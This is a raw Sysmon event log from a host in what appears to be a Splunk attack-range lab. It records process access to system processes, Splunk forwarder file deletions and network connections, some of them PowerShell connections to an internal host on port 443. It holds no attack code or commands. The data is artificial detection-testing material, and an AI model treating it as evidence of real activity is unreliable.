Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=31BC28BF53AA5F6D1B75F3D171CA05C5,SHA256=F0AF5BF1A01824F600370FE4A98BB988DAC581D57D83D8475F9E855B17678F7A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036497167Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:58.354{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-A08E-6140-7756-04000000C801}296C:\Windows\system32\wbem\wmiprvse.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497166Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:58.338{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-A08E-6140-7756-04000000C801}296C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036497165Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:58.338{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-A08E-6140-7756-04000000C801}296C:\Windows\system32\wbem\wmiprvse.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000036497172Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:59.537{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4FEFEF506FF799EB1D01A8D68E845BE6,SHA256=064497F2E48549398EDF2E2BCF27A01D963FCC0652763950A0C5A8A5D4E68420,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036497171Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:59.437{B81B27B7-4012-611D-0B00-00000000C801}6365140C:\Windows\system32\lsass.exe{B81B27B7-400F-611D-0100-00000000C801}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\kerberos.DLL+96fe2|C:\Windows\system32\kerberos.DLL+794d4|C:\Windows\system32\kerberos.DLL+144c9|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+2b3f4|C:\Windows\system32\lsasrv.dll+30949|C:\Windows\system32\lsasrv.dll+2e2a7|C:\Windows\system32\lsasrv.dll+2d231|C:\Windows\system32\lsasrv.dll+15e0d|C:\Windows\SYSTEM32\SspiSrv.dll+1a96|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e 23542300x800000000000000036497170Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:15:59.369{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=D96C7E28F78E2C8BC5C9025911F5BED0,SHA256=99C59481901EE37C01BC4D55EB546DE53CA84357F6E76E08617859E4F4B78893,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497173Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:00.553{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=017F9DAA8A02D73A6B31E34F21600491,SHA256=368D63C11FEB193BD0C57110EB41441F4E884455DD7CF37EC3FECA4B4C10C766,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497176Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:01.599{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1761C465967B351869A03948C7CBA5AF,SHA256=1AFA3CA7C60C643CFDCEFA55A3E8EBC701A35ECDF2D75904AA6593BAE4B7D020,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497175Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:29.787{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50500-false10.0.1.12-8000- 23542300x800000000000000036497174Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:01.015{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=5DB3097725CAC846F55FD71A2700EBF0,SHA256=E2396254D45F92EDB09CCDA7FB441CB8828C2E9457475CB03EEC19E94298B08F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497179Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:02.614{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=01033A256327BE35D1310B89420451D3,SHA256=43F5C872D1A5928CC6FCE292BF25ACB09CC8A328D1C21089FE1C332C7F9AD9E5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497178Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:31.683{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50502-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000036497177Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:31.117{B81B27B7-400F-611D-0100-00000000C801}4SystemNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50501-false10.0.1.14WIN-DC-128445microsoft-ds 23542300x800000000000000036497180Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:03.631{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E15EAF0E1318969534FB88352F690B9E,SHA256=B45D09E4FA86F16235EF6132DF935A2CF7E2D1A75F21CD6A3FAF14C3310FFC7C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497181Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:04.649{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF9C7B5230A13598132DE97BFB520E81,SHA256=36EB87E05A53691E5645BADB31E12AA35D0ADFC51F70FEB8AE9E5ABA3A84764A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000036497185Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:35.794{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local50504-false10.0.1.12-8000- 354300x800000000000000036497184Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:35.695{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local50503-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000036497183Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:05.694{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=85FE3DB6D547AE8D7AFDA5D3994C95EA,SHA256=32DFF8D0F5EC41A8B73F3A9D78B264B2171AD23EA9A409CB80B165454D91521C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497182Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:05.033{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=8250E3DD7AFD746D7036413F257BB369,SHA256=1B495B7F07C85822E61FA1984465EC3CC985CB3652ABAD78FBB1EE4B0422260E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497186Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:06.727{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C75F6046FBFB9BC39ED8CF5DF78F52C7,SHA256=1152EE94B53503FBC5B6817F860EB20346A61A23CACB0C07ACAD0D3A685E4E87,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036497195Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:07.928{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A097-6140-7856-04000000C801}6932C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497194Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:07.926{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497193Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:07.926{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497192Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:07.926{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497191Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:07.926{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497190Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:07.926{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-A097-6140-7856-04000000C801}6932C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000036497189Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:07.925{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-A097-6140-7856-04000000C801}6932C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000036497188Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:07.909{B81B27B7-A097-6140-7856-04000000C801}6932C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000036497187Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:07.746{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=87365111A6C32B9270BAD2FF00B683C5,SHA256=A8BF229A63022DE9817C40060CB06022A52A025BF4BBB1525AEEBBB4D9F57D96,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497207Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:08.926{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3137BA80495BA1C933F37E1A719FD452,SHA256=0D34B568C0D2C90506F5230B9E39EB1A11E1CB1E7EB16C71C027F53348E87E1A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497206Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:08.925{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=4C50BB655CA4346424644C3AD198508C,SHA256=328F3F706205C935A29504B4F1379691A5FAD92E949EE12CDAAC6B72F0DA2C4B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000036497205Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:08.760{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A82964CBE385A0F657E531B29A6CA378,SHA256=B7D6310A49E6263AF1928E023157E48E1E040C24F2196138C7DA456847CC3217,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000036497204Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:08.626{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-A098-6140-7956-04000000C801}5064C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497203Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:08.624{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497202Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:08.624{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497201Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:08.624{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497200Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 13:16:08.624{B81B27B7-4012-611D-0C00-00000000C801}7324464C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000036497199Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-14 